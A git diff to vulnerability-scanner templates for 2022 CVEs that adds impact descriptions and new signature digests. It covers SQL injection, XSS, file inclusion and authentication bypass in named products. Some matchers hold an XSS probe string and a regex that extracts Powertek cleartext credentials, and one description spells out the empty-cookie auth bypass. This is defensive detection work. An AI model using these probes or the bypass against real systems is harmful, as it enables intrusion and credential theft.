diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml
index ba8653344d..2d1bbf94bd 100644
--- a/http/cves/2022/CVE-2022-31981.yaml
+++ b/http/cves/2022/CVE-2022-31981.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team&id=.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "Control Teams")'
         condition: and
-# digest: 490a004630440220675acfb024dd54fe17e9cad394f7755fb7cd2196b4a3869f5cff6cf51d900aba02202f49e13b24f98b4ddf780e346d7619f88f34e97a4ca88a98074ad78a8289406e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ee05be3d8d6db3d3d4888ab7d2bc4116482bebdbfbf73e99b2855e177d396cc3022100a1857b13981f80958d8ea71b81d10aa3d48769b89d30f1288c9919832d63a2a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31982.yaml b/http/cves/2022/CVE-2022-31982.yaml
index b758de0240..7744add0ee 100644
--- a/http/cves/2022/CVE-2022-31982.yaml
+++ b/http/cves/2022/CVE-2022-31982.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "Request Detail")'
         condition: and
-# digest: 490a00463044022059ad314d2c068e9f95e4055465633f2c036969b3706c95332fff2ea98bfcae98022042899858cb245e9938ee7a77b551256152f0a6de7307c7840e5c04c6e218eafe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022030f454c39fb60765d9000891b4498cf28cadc518ec578cc2e1254149f57dd8320220254818b4e28d1378972201fb8cdc87cb69ff1e20e7ebd5b7f960dc309e571c7a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml
index 70e61a86e3..aed4df923c 100644
--- a/http/cves/2022/CVE-2022-31983.yaml
+++ b/http/cves/2022/CVE-2022-31983.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
   reference:
@@ -40,4 +42,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "Request Detail")'
         condition: and
-# digest: 4b0a00483046022100d2bf2c83b17a69bb4c33927c1bd18df64ef50fa5db8e47d9b980c44ba52b3821022100b89a2974f1c0b31e991a0213164eae847a6edd4520161d3ba4fa56fb6cdc85c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008db26a5be8bd3d1a72f0e24e8f3ed528674b8c95beb8161884f0765ff864d9d002206944e5357b20a0945c964e7948b3419a4afe916a81397b0518c505be155d7e55:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml
index 332d275828..cc143f010b 100644
--- a/http/cves/2022/CVE-2022-31984.yaml
+++ b/http/cves/2022/CVE-2022-31984.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or manipulation of the database.
   remediation: |
     To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201bf9851071bb7f531ab838ad63f75004a143ade2ce40dc30829aba6357721832022046d1d57ddf0238e02c7a156d7a98c1784785087b974d995ad123509e25c1934d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cc330b98b26abb2dd15a2b220426e0274b876ed2ac07eb411c69bdd81dca1b2602200beef7c18083979fdd4342c18b41a2c2abaf89b4fa2a71e9010118d28e270de0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32007.yaml b/http/cves/2022/CVE-2022-32007.yaml
index 4e4e9012b4..ffaddeeefb 100644
--- a/http/cves/2022/CVE-2022-32007.yaml
+++ b/http/cves/2022/CVE-2022-32007.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit&id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0.
   reference:
@@ -45,4 +47,4 @@ http:
         part: body
         words:
           - '{{md5({{num}})}}'
-# digest: 4b0a00483046022100944e21bb6dbb98fbf28a2cd80ee7508676887c63540e0a6837b34731adff407e022100fc00ba38a72284d5d0bac2f1fd9d2f5723ff8fe13ad23306d45ed8389b2906d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100daab08099b8ae9acedea56e65fbf2f0919127ca2b6e3653d015b7de9d5df735d02201d0c82e389fe6cff9cae48fdcedbde93d1ad4ca0b4b86ccb358c933bab0c2a84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml
index 98f7daf45f..a04001ac88 100644
--- a/http/cves/2022/CVE-2022-32018.yaml
+++ b/http/cves/2022/CVE-2022-32018.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0.
   reference:
@@ -38,4 +40,4 @@ http:
         part: body
         words:
           - '{{md5({{num}})}}'
-# digest: 490a0046304402205a0776aec76d82a15b918978bedbf776795c5fa727a279f2c40cbe9c17557f7a02205d5200030ebdd08456354893608932c6963c3850be7dbee943b25853d716479d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210090e04928235e92fbd467197ff9a2f286d33f41b920dc224e8f47bea8d7cd35e7022100e27abec4a5d767f35fb73752c0a0b184f5af2d9541bfb30a7fe3462fe0a7a1a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml
index 9265cbc07c..e7590d62ab 100644
--- a/http/cves/2022/CVE-2022-32022.yaml
+++ b/http/cves/2022/CVE-2022-32022.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207f72fe61c7d3d67c9fe24d9d0cb6d2b2e504a7f303f36350e1b56fa839197180022055a6673806995604034ac163c2e568b4436a754687f5189d591df50df6502ff0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201d81df04ce68796172aefa6e3001c0cb87b33997fdf938fa8e1996d42b4985e8022100b78dd5d1c1680300b88f2494f35a23f6bbebec715e5d2e3362bd3b1c9797c77d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml
index 0a4d33cee6..b01ecb2a52 100644
--- a/http/cves/2022/CVE-2022-32024.yaml
+++ b/http/cves/2022/CVE-2022-32024.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Car Rental Management System 1.0 contains an SQL injection vulnerability via /booking.php?car_id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or even complete compromise of the system.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220628fb1c3737112212f62d4fcf127745a019c1559004e261b31ad2d13edd9d63002204415e76207e01ef56bc9fd61591e9dd9487197862e92202f3a713e6644e95b63:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b9033ac7391e7fe22bfecca95aa2c13abdffe4e3261d08da6a05ac46133cc7d9022100b9da3758bfb61a78c5acf8ce73c60f793f59924605b4f251a5c8e01d25f40a9e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml
index 32cd6ff04c..96c1791712 100644
--- a/http/cves/2022/CVE-2022-32025.yaml
+++ b/http/cves/2022/CVE-2022-32025.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022048190a0d81af9ee5a4cd038c28c470f4b52b0523662bfcd6d15affb6624e078a022100e18877bdc54d24100119aa3f7a3eaee0bcffaddf3a7c3cf4668d305bf5661c6f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205c8c84cb6824b13f70098e62c7e23bdd53839f90eb601a2b270012dfee8cb284022100b491a6b7a5e459136271d2a3fd63612e99ddddf36d4f7a1ea0e6b7d99249b6b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml
index cc563bb2da..21384399a8 100644
--- a/http/cves/2022/CVE-2022-32026.yaml
+++ b/http/cves/2022/CVE-2022-32026.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_booking.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022063a3cdb58a40236f1cdb45e493ce4911c93cb1b2fed8b9327e78d1d9feedae3c0220667f1423ad2e6b20a16ae2de38ab32e58c1037397db6be669cb94d762a280104:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009a27ead44d0f0f4816b414a71f047a0b245444516eaab4cf6b55081ff8173b1802204e3401ae5d2a3fe94a7d6d2851ea217d777f89d14c1c89b6064a4b30d780964f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml
index d3f0a05d38..83e9383fda 100644
--- a/http/cves/2022/CVE-2022-32028.yaml
+++ b/http/cves/2022/CVE-2022-32028.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008d536b021644039c05a1f77fe3bf4b23f672f2f68b747325532f36e08aa4e630022100845f691cd0d3876e5362affa4bbe6b2b37d8a38e2f0f23df8e4499f4b48bae33:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b28ee0ddfa46bb29d007970affe3fd15e2be935652d6fbdd2b33a714a4465a89022100aa6dbed6405694b08c3f48c96683a268cef81603b54e00da345a912988a22bce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml
index 69e42c3478..61a8c3650d 100644
--- a/http/cves/2022/CVE-2022-32094.yaml
+++ b/http/cves/2022/CVE-2022-32094.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a7615178ce96fd28ab9613e437a56a7cfbadc2c549cb477659003856d8c85803022059332c35648d713beae88d3cc74aae756e85334ad032cf31a42367fc28e6f9c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220488286672dac10aeed360d435c6f3404ba6c905332143d6dfa05023a3df5676f02204d42f6d060cf35a8175739448fbbe5392759b87aa452ebfe140fe996a8b52344:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml
index 665b5c32e1..741ac214b3 100644
--- a/http/cves/2022/CVE-2022-32195.yaml
+++ b/http/cves/2022/CVE-2022-32195.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL.
+  impact: |
+    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Apply the latest security patches or updates provided by Open edX to fix the Cross-Site Scripting vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207a708aa83f7b8df9c61909ead4bf8e79d798599be12be7ecae78893c4685e92502202f4263202b95653fbd6ee7adf883e84c4a7d1aff407caa6e61768026bdac771a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207749d818583c01a6836a4cdd162c298b4fafd843ee256c8131036641a8dd16d0022100c6fe053bb384426966b47ebe7ecf301eb165d9d530fb6616b44cd6e9b71f1dc5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml
index fd2779d853..b91fd54e26 100644
--- a/http/cves/2022/CVE-2022-32409.yaml
+++ b/http/cves/2022/CVE-2022-32409.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
   remediation: |
     Apply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210085a7bfd80513b7bc5488399874f4fd68b47dbb12b6eef5780029c37b230828b602210093c158a5977e490f01e2aecae9873d3e671b5a1f8d64b7296f974c93fa238fc0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bf1ca568d1a8be64303ef76bf6fac4f3f6917ad6ab624fa8a3bb9205736848b7022100c99df1a8040b2e1ae32a7928fd779062fab538a1c25a6d64ec7d559d71ef54fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml
index 523f8529a0..230e81c3ae 100644
--- a/http/cves/2022/CVE-2022-32429.yaml
+++ b/http/cves/2022/CVE-2022-32429.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022026022fd359f54b68128cdaafd241f99476948524710ce137adccf890a44ede6c02203c18bb146f46cb78b4ee27cda985bac7e38e6abf756d5cd9ba169a8571424553:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022046c4a55c07a73d6191e338c7948b1e75aff949344d03017e95c514a8e248bccb0221009a8201f41622d04983488a4bdcad618e431c34ff32cf078d928c1fa2544ea13e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32444.yaml b/http/cves/2022/CVE-2022-32444.yaml
index e20e9c9809..644b2869d0 100644
--- a/http/cves/2022/CVE-2022-32444.yaml
+++ b/http/cves/2022/CVE-2022-32444.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
   remediation: |
     Apply the latest patch or update to a version that has fixed this vulnerability.
   reference:
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4b0a0048304602210082bcc5d8531e023d8cf71e64f39e16015e48d2c12762e715c24dc548a809eef002210085777f1a6b86d6441b47bc82e6473e8774de3e7b765a2580142dec831f332142:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022021b20bf4f52da3764fd87645709750af93fc8ae7c1cf49613707e128b42fe903022100df28514927806c188102bc5d50c112b53578c733d4faefcbfa96ed1e7fc29f0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml
index a178977896..460874eb38 100644
--- a/http/cves/2022/CVE-2022-32770.yaml
+++ b/http/cves/2022/CVE-2022-32770.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'toast' parameter, which is inserted into the document with insufficient sanitization.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022019d79e12f8e05b4b6784dec9d6ed81bce25fd3fce9d8b954848669875db6c995022100b26affa5691cd1098bbbcf98cbac7faf7a3cc4dab06d84f8c39c004c551675a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220295281e18e9e22e501e64553f0391f769a69995f2af8845f34dfdd404286bd02022100b7dd59991fcc6ce0464048cd81504b667866bd6216f0e69e12f50438271301ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32771.yaml b/http/cves/2022/CVE-2022-32771.yaml
index a0abc9d8d4..71d746c121 100644
--- a/http/cves/2022/CVE-2022-32771.yaml
+++ b/http/cves/2022/CVE-2022-32771.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210089897e491eb3720e1aa656bbba8b9ff1ae8ce918da195eb56a47c352017f6ad8022100d2bdec58fd753eb2b4ca70e60639256839f8bdc51d6ceb4f0e999362869bc63f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100db679dbca1055e5b8ec7dd2720020033ee63c5515617a1ca11c4084c393b0472022005e8d1d9c1effdb0209c9e792c632d652d705ad0ccea3a35f254f060d51f7e8e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml
index 5fa3ec8688..f662fa2ea0 100644
--- a/http/cves/2022/CVE-2022-32772.yaml
+++ b/http/cves/2022/CVE-2022-32772.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203eb4fdc023d63a0534088bb0ea040930942e4e31ac7882be118e02035024994b022100fabc7f1d52423856b0c5faab43b11155d8820402ce736829652fc6c899b2391e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022036c36d83ca979739c9e37511a77706edd21c39a9898e5790680e8efc34c8385c022020b954ce34cca64c1cc745e71d6ba9776a3eee1e27b39d65f6cc0a148087988b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml
index 8c6d3320af..3f7b5cca2c 100644
--- a/http/cves/2022/CVE-2022-33119.yaml
+++ b/http/cves/2022/CVE-2022-33119.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'status_code == 200'
           - contains(body,'<script>alert(document.domain)</script><\"?cmd=')
         condition: and
-# digest: 4a0a0047304502201ecdb2e7d73e408a48838d28bc9ce4f5a98598d3e0b53861c138823ad004ce82022100a2f52f8af3ff6140e5896b96a1d784b984f4e8d82dfd115766dbcf510ef3e848:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b8e4c5a7b8720ef543740bb5fade84d5d930363ebe7c16de94c8ee8a588d1f9c022100c53bb68c7dd464351cf14ad776434c4b829a9990c333262eec7373e4d5357e13:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml
index 162451caf6..e7b34e00e7 100644
--- a/http/cves/2022/CVE-2022-33174.yaml
+++ b/http/cves/2022/CVE-2022-33174.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the Powertek Firmware, potentially leading to further compromise of the system.
   remediation: |
     Upgrade the Powertek Firmware to version 3.30.30 or higher to mitigate the vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
           - '<sys\.passwd>([A-Z0-9a-z]+)<\/sys\.passwd>'
           - '<sys\.su\.name>([a-z]+)<\/sys\.su\.name>'
         part: body
-# digest: 4a0a0047304502202e43d938f5d5a91a3a5d5f6420ba5953010fe3840095c94a4f72eef5248dc5c1022100b2e3f0d464b610a968defebe851fd419dca6e8fb226b7424512434001344cf4b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206f4d357ab0f128ad29b9bec048b0dd3100024fc479c34d0d2d8116c8d9a511e00221009455db882f132fd611164a3a37a3bfce8ae608367fdc389e5a2095fb46a22009:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml
index ced6417314..971a280609 100644
--- a/http/cves/2022/CVE-2022-33891.yaml
+++ b/http/cves/2022/CVE-2022-33891.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Apache Spark UI is susceptible to remote command injection. ACLs can be enabled via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow impersonation by providing an arbitrary user name. An attacker can potentially reach a permission check function that will ultimately build a Unix shell command based on input and execute it, resulting in arbitrary shell command execution. Affected versions are 3.0.3 and earlier, 3.1.1 to 3.1.2, and 3.2.0 to 3.2.1.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
   remediation: |
     Apply the latest security patches or updates provided by Apache Spark to fix the remote command injection vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
         part: body
         words:
           - "19833-2202-EVC"
-# digest: 4a0a004730450220787334b61256064e6ea15de3cf8cc8d9dbd512c4811c3a26c370e213fa2d4b0b022100c1dcfa777b732c652787783a3d6f521a9e12fe6d42d7f1d3eab471b9ab272586:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c05c45a04a1deb3bb13a7fd11acbae2575c545eb0312473feb408bad72af60e8022100bc4ff1d410019b6329b073049e20d00810e1aa92fd1941a36bd2198c6841ee3c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml
index ff496f0492..5bf3586519 100644
--- a/http/cves/2022/CVE-2022-33901.yaml
+++ b/http/cves/2022/CVE-2022-33901.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    An attacker can access sensitive information stored in arbitrary files on the server, potentially leading to further compromise of the system.
   remediation: |
     Update WordPress MultiSafepay for WooCommerce plugin to version 4.13.1 or later.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220138f1f6b7524ad772a2e981970bcd954d89071c6c598b9d499533490352390ae0220376e61eb85b5baa038a985f13074f0a2eb83339fd01279ab5ecb58f74b7212e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
